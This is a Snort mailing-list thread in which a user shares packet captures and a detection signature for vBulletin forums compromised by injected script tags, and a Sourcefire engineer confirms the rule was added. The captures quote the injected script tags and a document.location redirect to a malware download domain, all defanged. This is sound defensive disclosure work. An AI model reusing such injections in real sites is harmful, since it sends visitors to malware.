Snort mailing list archives
Re: Compromised vBulletin sig
From: Matt Mickel <mmickel () sourcefire com>
Date: Thu, 30 Apr 2015 14:49:42 -0400
Hi, James- This rule has been reviewed and added to the community ruleset. I removed the PCRE from the committed version and instead used the within content modifier. This made the rule much more efficient while still detecting the relevant content. Thanks so much for your submission. Cheers, Matt Mickel On 04/16/2015 01:30 PM, James Lay wrote:
Didn't see this in any current ruleset, so I thought I'd post it here. Yesterday I saw two of these. Injected into the vBulletin initial page: <script type="text/javascript" src="meow://meh[.]com/misc.php?v=364&js=js"></script> <script type="text/javascript" src="meow://bleh[.]com/forums/misc.php?v=420&js=js"></script> ####################################################################################### GET /misc.php?v=364&js=js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: meh.com Cookie: __cfduid=bleh; bbsessionhash=bleh; bblastvisit=1429113507; bblastactivity=0 Cache-Control: max-stale=0 Connection: Keep-Alive Pragma: no-cache HTTP/1.1 200 OK Date: Wed, 15 Apr 2015 15:58:25 GMT Content-Type: text/html; charset=ISO-8859-1 Transfer-Encoding: chunked Connection: keep-alive Expires: 0 Cache-Control: private, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Set-Cookie: bblastactivity=0; expires=Thu, 14-Apr-2016 15:58:27 GMT; path=/ Set-Cookie: bblang_id=en; expires=Thu, 16-Apr-2015 01:58:27 GMT X-Powered-By: PleskLin Server: cloudflare-nginx CF-RAY: 1d78da121f59012e-SJC Content-Encoding: gzip document.location='meow://filestore72[.]info/download.php?id=f823cc00' ####################################################################################### This in turn goes to: ####################################################################################### GET /download.php?id=f823cc00 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: filestore72[.]info Cache-Control: max-stale=0 Connection: Keep-Alive Pragma: no-cache HTTP/1.1 302 Moved Temporarily Server: nginx/1.0.12 Date: Wed, 15 Apr 2015 15:53:40 GMT Content-Type: text/html Content-Length: 161 Connection: close Location: meow://pdta23sj9kkdl9wwtakzzhf.antalyagunlukkiralik[.]org/index.php?z=Z2xham91PWtuY2h2JnRpbWU9MTUwNDE1MTU0NTI1ODI3MDI4MSZzcmM9NzYmc3VybD1maWxlc3RvcmU3Mi5pbmZvJnNwb3J0PTgwJmtleT0yN0ExMzA0MSZzdXJpPS9kb3dubG9hZC5waHAlM2ZpZD1mODIzY2MwMA== <html> <head><title>302 Found</title></head> <body bgcolor="white"> <center><h1>302 Found</h1></center> <hr><center>nginx/1.0.12</center> </body> </html> ####################################################################################### Seems to be old-ish news, but the sig is below: alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SERVER-WEBAPP Compromised vbulletin site"; flow:established,to_server; uricontent:"/misc.php?"; uricontent:"v="; uricontent:"js=js"; pcre:"/misc.php\x3Fv\x3D[0-9]{3}\x26js\x3Djs/Ui"; reference:url,http://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info; classtype:bad-unknown; sid:10000156; rev:1;) As usual, not sure if I have this perfect so anything to improve this sig would be excellent. Thank you. James ------------------------------------------------------------------------------ BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT Develop your own process in accordance with the BPMN 2 standard Learn Process modeling best practices with Bonita BPM through live exercises http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- event?utm_ source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF _______________________________________________ Snort-sigs mailing list Snort-sigs () lists sourceforge net https://lists.sourceforge.net/lists/listinfo/snort-sigs http://www.snort.org Please visit http://blog.snort.org for the latest news about Snort!
------------------------------------------------------------------------------ One dashboard for servers and applications across Physical-Virtual-Cloud Widest out-of-the-box monitoring support with 50+ applications Performance metrics, stats and reports that give you Actionable Insights Deep dive visibility with transaction tracing using APM Insight. http://ad.doubleclick.net/ddm/clk/290420510;117567292;y _______________________________________________ Snort-sigs mailing list Snort-sigs () lists sourceforge net https://lists.sourceforge.net/lists/listinfo/snort-sigs http://www.snort.org Please visit http://blog.snort.org for the latest news about Snort!
Current thread:
- Compromised vBulletin sig James Lay (Apr 16)
- Re: Compromised vBulletin sig Matt Mickel (May 04)